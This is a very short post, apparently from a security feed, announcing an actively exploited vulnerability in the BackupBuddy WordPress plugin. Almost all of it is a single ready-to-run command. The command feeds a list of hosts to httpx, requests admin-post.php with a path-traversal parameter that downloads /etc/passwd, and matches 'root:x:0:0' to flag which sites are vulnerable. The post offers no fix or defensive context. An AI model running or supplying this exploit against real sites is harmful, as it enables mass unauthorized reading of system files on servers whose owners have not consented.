BackupBuddy Wordpress plugin vulnerability
A new Wordpress vulnerability in the BackupBuddy plugin, actively used for a week now.
$ cat hosts | httpx -title -path "/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd" -match-string "root:x:0:0"